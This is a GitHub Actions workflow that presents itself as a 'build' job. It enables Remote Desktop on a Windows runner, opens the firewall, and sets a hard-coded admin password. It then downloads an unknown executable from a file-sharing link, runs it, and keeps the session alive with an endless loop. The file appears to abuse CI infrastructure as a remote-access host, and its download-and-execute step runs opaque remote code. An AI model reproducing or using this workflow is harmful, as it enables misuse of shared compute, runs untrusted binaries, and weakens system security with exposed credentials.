name: last

on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    steps:
      - name: Enable TS
        run: |
          Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
          Write-Host "Terminal Server enabled."

      - name: Enable Firewall Rule
        run: |
          Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
          Write-Host "Firewall rule for Remote Desktop enabled."

      - name: Set User Authentication
        run: |
          Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1
          Write-Host "User authentication for RDP set."

      - name: Set Runner Admin Password
        run: |
          $password = ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force
          Set-LocalUser -Name "runneradmin" -Password $password
          Write-Host "Runner admin password set."

      - name: Download Batch File
        run: |
          Invoke-WebRequest -Uri "https://sharedby.blomp.com/plgkJs" -OutFile "run.exe"
          Write-Host "Batch file downloaded."

      - name: Execute Batch File
        run: |
          Start-Process -FilePath "run.exe"
          Write-Host "Executing batch file..."
          while (Get-Process | Where-Object { $_.ProcessName -eq "run" }) {
              Start-Sleep -Seconds 5
          }

      - name: Keep Session Busy with Random String
        run: |
          while ($true) {
              $randomString = -join ((65..90) + (97..122) + (49..57) | Get-Random -Count 10 | ForEach-Object {[char]$_})
              Write-Host $randomString
              Start-Sleep -Seconds 1
          }
